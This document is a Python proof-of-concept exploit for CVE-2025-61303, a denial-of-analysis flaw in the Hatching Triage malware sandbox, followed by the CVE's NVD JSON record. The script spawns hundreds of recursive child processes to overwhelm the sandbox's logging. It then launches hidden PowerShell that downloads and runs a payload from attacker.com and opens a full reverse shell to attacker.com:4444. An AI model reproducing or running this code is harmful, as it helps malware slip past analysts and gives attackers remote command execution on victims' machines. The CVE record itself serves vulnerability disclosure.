CVE-2025-61303

# CVE-2025-61303 PoC - Hatching Triage Sandbox Denial-of-Analysis # This PoC demonstrates how to evade Hatching Triage Sandbox by exhausting # the behavioral analysis engine through recursive child process spawning. import subprocess import sys import os import time def spawn_child(): """ Recursively spawn child processes to exhaust sandbox resources. Each child process will trigger API hooks in the sandbox, generating massive log volumes and consuming system resources. """ try: # Use cmd.exe to recursively spawn more processes # The /c flag executes the command and terminates subprocess.Popen( ['cmd.exe', '/c', sys.executable, __file__], creationflags=subprocess.CREATE_NEW_CONSOLE ) except Exception: pass def execute_malicious_payload(): """ After exhausting sandbox resources, execute the actual malicious payload. These actions will NOT be recorded by the sandbox due to resource exhaustion. """ # Example: Execute PowerShell command (will not be logged) subprocess.Popen( ['powershell.exe', '-NoProfile', '-WindowStyle', 'Hidden', '-Command', 'Invoke-WebRequest -Uri http://attacker.com/payload.ps1 -OutFile $env:TEMP\payload.ps1; & $env:TEMP\payload.ps1'], creationflags=subprocess.CREATE_NO_WINDOW ) # Example: Establish reverse shell (will not be logged) subprocess.Popen( ['powershell.exe', '-NoProfile', '-WindowStyle', 'Hidden', '-Command', '$client = New-Object System.Net.Sockets.TCPClient("attacker.com",4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $x = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($x,0,$x.Length); $stream.Flush()}'], creationflags=subprocess.CREATE_NO_WINDOW ) def main(): # Phase 1: Exhaust sandbox resources by spawning many child processes max_processes = 500 # Adjust based on target system for i in range(max_processes): spawn_child() # Phase 2: Wait for sandbox to be overwhelmed time.sleep(5) # Phase 3: Execute actual malicious payload (undetected) execute_malicious_payload() if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-61303", "sourceIdentifier": "[email protected]", "published": "2025-10-20T21:15:38.330", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hatching Triage Sandbox Windows 10 build 2004 (2025-08-14) and Windows 10 LTSC 2021(2025-08-14) contains a vulnerability in its Windows behavioral analysis engine that allows a submitted malware sample to evade detection and cause denial-of-analysis. The vulnerability is triggered when a sample recursively spawns a large number of child processes, generating high log volume and exhausting system resources. As a result, key malicious behavior, including PowerShell execution and reverse shell activity, may not be recorded or reported, misleading analysts and compromising the integrity and availability of sandboxed analysis results."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://github.com/eGkritsis/CVE-2025-61303", "source": "[email protected]"}]}}